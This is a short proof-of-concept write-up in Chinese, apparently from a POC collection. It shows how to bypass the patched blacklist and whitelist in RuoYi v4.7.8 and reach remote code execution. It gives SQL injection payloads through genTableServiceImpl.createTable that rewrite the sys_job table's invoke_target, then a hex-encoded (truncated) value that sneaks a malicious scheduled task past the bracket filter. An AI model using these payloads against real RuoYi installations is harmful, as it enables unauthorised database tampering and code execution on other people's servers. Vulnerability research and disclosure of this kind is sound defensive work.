POC/wpoc/RuoYi/RUOYI-v4.7.8存在远程代码执行漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1.3 KiB
Raw Blame History

RUOYI-v4.7.8存在远程代码执行漏洞

SQL

在补丁中,采用了黑名单和白名单的策略。

image

不过,我通过使用白名单类成功绕过了它,并成功进行了 SQL 注入。

genTableServiceImpl.createTable('SELECT 1 FROM 'Hack By 1ue';')

image

genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 'Hack By 1ue' WHERE job_id = 1;') 修改表数据成功job_id

RCE

JobInvokeUtil由于调用时字符串中不允许有括号所以我将原作业表中特定作业的参数值修改为十六进制绕过防御检测从而启用了另一个远程代码执行RCE的定时任务

image

genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x6a61... WHERE job_id = 2;')

image

作业的 invoke_target 已更改

image

漏洞来源